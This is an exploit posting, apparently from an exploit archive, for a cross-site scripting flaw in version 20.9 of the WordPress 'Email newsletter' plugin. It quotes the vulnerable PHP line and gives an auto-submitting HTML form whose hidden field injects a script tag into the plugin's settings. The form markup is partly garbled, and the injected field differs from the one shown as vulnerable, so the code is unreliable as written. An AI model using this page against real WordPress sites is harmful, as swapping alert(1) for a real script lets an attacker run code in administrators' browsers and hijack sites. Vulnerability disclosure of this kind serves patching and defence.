###################### # Exploit Title : Wordpress Email newsletter 20.9 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/email-newsletter/ # Software Link : https://downloads.wordpress.org/plugin/email-newsletter.20.9.zip # Date : 2015-01-03 # Tested on : Windows 7 / Mozilla Firefox ###################### ###################### # Vulnerable code : <input name="eemail_from_name" id="eemail_from_name" type="text"value="<?php echo $eemail_from_name; ?>" maxlength="150" size="50" /> ##################### Exploit Code: <html> <body> <form name="eemail_form" method="post"_email_setting()" > <input name="eemail_from_email" id="eemail_from_email" type="hidden"value='"><script>alert(1)</script>' maxlength="150" size="50" /> <script language="Javascript"> setTimeout('eemail_form.submit()', 1); </script> </body> </html>